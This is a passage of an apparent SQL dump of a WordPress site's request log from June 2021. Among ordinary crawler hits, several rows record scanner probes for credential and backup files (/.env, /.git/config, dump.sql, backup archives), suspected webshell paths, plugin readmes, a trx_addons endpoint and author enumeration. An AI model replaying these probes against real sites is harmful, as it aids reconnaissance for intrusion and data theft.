21:00:12','//wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61291,'2021-06-09 21:00:12','/wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','103.88.170.246'),(61292,'2021-06-09 21:00:14','//wp-content/plugins/business-directory-plugin/assets/js/admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61293,'2021-06-09 21:00:15','/wp-content/plugins/business-directory-plugin/assets/js/admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/business-directory-plugin/assets/js/admin.js','103.88.170.246'),(61294,'2021-06-09 21:00:16','//wp-content/plugins/business-directory-plugin/assets/js/admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61295,'2021-06-09 21:00:17','/wp-content/plugins/business-directory-plugin/assets/js/admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/business-directory-plugin/assets/js/admin.js','103.88.170.246'),(61296,'2021-06-09 21:00:18','//wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61297,'2021-06-09 21:00:19','/wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','103.88.170.246'),(61298,'2021-06-09 21:00:21','//wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61299,'2021-06-09 21:00:21','/wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/controlled-admin-access/admin/js/controlled-admin-access-admin.js','103.88.170.246'),(61300,'2021-06-09 21:00:22','//wp-content/plugins/official-facebook-pixel/css/admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61301,'2021-06-09 21:00:23','/wp-content/plugins/official-facebook-pixel/css/admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/official-facebook-pixel/css/admin.css','103.88.170.246'),(61302,'2021-06-09 21:00:25','//wp-content/plugins/official-facebook-pixel/css/admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61303,'2021-06-09 21:00:25','/wp-content/plugins/official-facebook-pixel/css/admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/official-facebook-pixel/css/admin.css','103.88.170.246'),(61304,'2021-06-09 21:00:26','//wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61305,'2021-06-09 21:00:27','/wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','103.88.170.246'),(61306,'2021-06-09 21:00:29','//wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61307,'2021-06-09 21:00:29','/wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/simple-301-redirects/assets/js/simple-301-redirects.core.min.js','103.88.170.246'),(61308,'2021-06-09 21:00:30','//wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61309,'2021-06-09 21:00:31','/wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','103.88.170.246'),(61310,'2021-06-09 21:00:33','//wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61311,'2021-06-09 21:00:33','/wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/simple-301-redirects/assets/css/simple-301-redirects.css','103.88.170.246'),(61312,'2021-06-09 21:00:35','//wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61313,'2021-06-09 21:00:36','/wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','103.88.170.246'),(61314,'2021-06-09 21:00:37','//wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61315,'2021-06-09 21:00:37','/wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/fancy-product-designer/assets/css/FancyProductDesigner-all.min.css','103.88.170.246'),(61316,'2021-06-09 21:00:39','//wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61317,'2021-06-09 21:00:40','/wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','103.88.170.246'),(61318,'2021-06-09 21:00:41','//wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61319,'2021-06-09 21:00:41','/wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/fancy-product-designer/assets/js/FancyProductDesigner.js','103.88.170.246'),(61320,'2021-06-09 22:01:18','/\">Rembrandt','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61321,'2021-06-09 23:23:14','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','3.81.23.249'),(61322,'2021-06-09 23:23:26','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','3.81.23.249'),(61323,'2021-06-09 23:23:40','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','3.81.23.249'),(61324,'2021-06-09 23:23:53','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','3.81.23.249'),(61325,'2021-06-09 23:49:03','//?author=2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36',NULL,'52.152.178.237'),(61326,'2021-06-09 23:49:04','//?author=3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36',NULL,'52.152.178.237'),(61327,'2021-06-09 23:49:06','/]San','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61328,'2021-06-09 23:57:33','/dump.sql','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61329,'2021-06-10 00:54:46','/_oddsd.php?test=hello','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,'69.12.66.211'),(61330,'2021-06-10 00:54:48','/_oddsd.php?test=hello','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,'69.12.66.211'),(61331,'2021-06-10 01:44:23','/wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15',NULL,'193.169.254.102'),(61332,'2021-06-10 01:44:23','/wp-content/plugins/wc-frontend-manager/readme.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15',NULL,'193.169.254.102'),(61333,'2021-06-10 02:33:59','/archive/archive.zip','Go-http-client/1.1',NULL,'91.213.50.165'),(61334,'2021-06-10 02:33:59','/archive/archive.zip','Go-http-client/1.1','http://teethwhiteningproduct.co.uk/archive/archive.zip','91.213.50.165'),(61335,'2021-06-10 02:59:16','//?author=2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',NULL,'3.136.97.9'),(61336,'2021-06-10 06:41:46','/award-winning-clinicâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61337,'2021-06-10 06:41:52','/book-a-teeth-whitening-sessionâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61338,'2021-06-10 07:02:16','/book-a-teeth-whitening-sessionâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61339,'2021-06-10 07:02:26','/award-winning-clinicâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61340,'2021-06-10 07:19:16','/2018/01/30/preventive-dentistry/','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61341,'2021-06-10 07:19:49','/2018/08/14/how-to-achieve-the-perfect-smile/','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61342,'2021-06-10 07:39:03','/book-a-teeth-whitening-sessionâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61343,'2021-06-10 07:39:13','/award-winning-clinicâ','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61344,'2021-06-10 07:58:58','/2018/08/14/how-to-achieve-the-perfect-smile/','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61345,'2021-06-10 07:59:09','/2018/01/30/preventive-dentistry/','serpstatbot/2.0 beta (advanced backlink tracking bot; http://serpstatbot.com/; abuse@serpstatbot.com)',NULL,'144.76.67.25'),(61346,'2021-06-10 12:49:39','/\">Chevy','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61347,'2021-06-10 13:09:17','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.148.13'),(61348,'2021-06-10 14:11:36','/.gitignore','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)',NULL,'185.220.101.11'),(61349,'2021-06-10 14:11:47','/.git/config','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)',NULL,'185.220.100.255'),(61350,'2021-06-10 14:11:56','/.git/HEAD','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)',NULL,'163.172.41.228'),(61351,'2021-06-10 14:11:59','/.git/index','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)',NULL,'104.244.75.80'),(61352,'2021-06-10 14:30:02','/award-winning-clinic‎','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,'157.55.39.178'),(61353,'2021-06-10 16:37:43','/backup.sql','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61354,'2021-06-10 19:42:44','/dc.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','teethwhiteningproduct.co.uk','45.79.228.6'),(61355,'2021-06-10 19:43:29','/db.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','teethwhiteningproduct.co.uk','45.79.228.6'),(61356,'2021-06-10 20:59:32','/]Fair','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61357,'2021-06-10 21:06:00','/]Teeth','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61358,'2021-06-10 21:11:32','/]Texas','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61359,'2021-06-10 21:17:30','/]Modesto','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61360,'2021-06-10 22:44:40','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk///?author=2','162.241.101.87'),(61361,'2021-06-10 22:56:13','/.env','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36',NULL,'203.159.80.189'),(61362,'2021-06-10 23:43:10','/wp-content/plugins/social-warfare/readme.txt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',NULL,'107.150.169.74'),(61363,'2021-06-11 01:46:00','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.139.42'),(61364,'2021-06-11 04:22:29','/db.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','www.teethwhiteningproduct.co.uk','159.65.86.130'),(61365,'2021-06-11 04:22:30','/db.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','www.teethwhiteningproduct.co.uk','159.65.86.130'),(61366,'2021-06-11 04:23:05','/dc.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','www.teethwhiteningproduct.co.uk','159.65.86.130'),(61367,'2021-06-11 04:23:10','/dc.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','www.teethwhiteningproduct.co.uk','159.65.86.130'),(61368,'2021-06-11 07:33:12','/backup/archive.zip','Go-http-client/1.1',NULL,'91.213.50.165'),(61369,'2021-06-11 07:33:12','/backup/archive.zip','Go-http-client/1.1','http://teethwhiteningproduct.co.uk/backup/archive.zip','91.213.50.165'),(61370,'2021-06-11 10:12:44','/site.sql','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61371,'2021-06-11 11:40:27','/wp-json/trx_addons/v2/get/sc_layout?sc=print_r','python-requests/2.18.4',NULL,'78.46.210.120'),(61372,'2021-06-11 11:50:35','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,'157.90.181.150'),(61373,'2021-06-11 11:50:35','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,'157.90.181.150'),(61374,'2021-06-11 11:50:41','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,'157.90.181.150'),(61375,'2021-06-11 11:50:45','/2018/08/14/how-to-achieve-the-perfect-smile/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,'157.90.181.150'),(61376,'2021-06-11 12:29:40','/db.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','teethwhiteningproduct.co.uk','211.233.33.230'),(61377,'2021-06-11 15:19:16','//?author=2','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',NULL,'62.210.123.29'),(61378,'2021-06-11 15:19:16','//?author=3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',NULL,'62.210.123.29'),(61379,'2021-06-11 18:28:05','/db.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','www.teethwhiteningproduct.co.uk','158.69.246.100'),(61380,'2021-06-11 18:28:06','/db.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','www.teethwhiteningproduct.co.uk','158.69.246.100'),(61381,'2021-06-11 20:39:58','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.156.126'),(61382,'2021-06-11 20:40:00','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.156.126'),(61383,'2021-06-11 20:52:12','/2018/08/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,'66.249.66.41'),(61384,'2021-06-11 20:52:13','/2018/08/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,'66.249.66.93'),(61385,'2021-06-11 23:28:54','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.148.13'),(61386,'2021-06-11 23:28:55','/2018/08/14/how-to-achieve-the-perfect-smile','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.148.13'),(61387,'2021-06-11 23:59:30','/èåºè¢é©´','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,'5.9.77.102'),(61388,'2021-06-12 00:19:33','/?p=15','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/about-us','95.216.96.244'),(61389,'2021-06-12 00:19:38','/?p=13','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/dentists','95.216.96.244'),(61390,'2021-06-12 00:19:51','/?p=127','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile','95.216.96.244'),(61391,'2021-06-12 01:08:23','/"','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61392,'2021-06-12 02:34:04','/2018/08/14/how-to-achieve-the-perfect-smile/','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61393,'2021-06-12 02:52:13','/tag/','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61394,'2021-06-12 03:17:47','/category/','Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/)','https://teethwhiteningproduct.co.uk/','216.18.204.209'),(61395,'2021-06-12 04:20:46','/web.sql','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0','https://teethwhiteningproduct.co.uk','45.92.228.50'),(61396,'2021-06-12 07:52:46','/?p=151','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile/can-you-make-dental-implants-last-forever','95.216.96.244'),(61397,'2021-06-12 07:52:51','/?p=161','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/discover-the-zoom-difference','95.216.96.244'),(61398,'2021-06-12 07:52:57','/?p=164','Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)','https://teethwhiteningproduct.co.uk/award-winning-clinic%e2%80%8e','95.216.96.244'),(61399,'2021-06-12 08:17:36','/wp-content/upgrade/wp2/wp2.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36','https://teethwhiteningproduct.co.uk/wp-content/upgrade/wp2/wp2.php','37.188.32.3'),(61400,'2021-06-12 08:52:09','/2018/01/30/preventive-dentistry/','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.139.42'),(61401,'2021-06-12 08:52:27','/bkp/archive.zip','Go-http-client/1.1',NULL,'91.213.50.165'),(61402,'2021-06-12 08:52:27','/bkp/archive.zip','Go-http-client/1.1','http://teethwhiteningproduct.co.uk/bkp/archive.zip','91.213.50.165'),(61403,'2021-06-12 10:16:47','/]Boca','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,'216.244.66.198'),(61404,'2021-06-12 11:53:40','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.147.39'),(61405,'2021-06-12 11:53:41','/2018/01/30/preventive-dentistry','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,'114.119.147.39'),(61406,'2021-06-12 12:39:51','/blog/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk/blog/wp-login.php','198.27.99.63'),(61407,'2021-06-12 13:53:18','/wp/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk/wp/wp-login.php','18.198.134.166'),(61408,'2021-06-12 14:25:19','/wp-content/themes/alternate-lite/inc/customizer.php','Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)',NULL,'139.59.76.9'),(61409,'2021-06-12 14:25:20','/wp-content/themes/alternate-lite/inc/customizer.php','Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)',NULL,'139.59.76.9'),(61410,'2021-06-12 15:44:07','/?p=5','Mozilla/5.0 (compatible; SEOkicks; 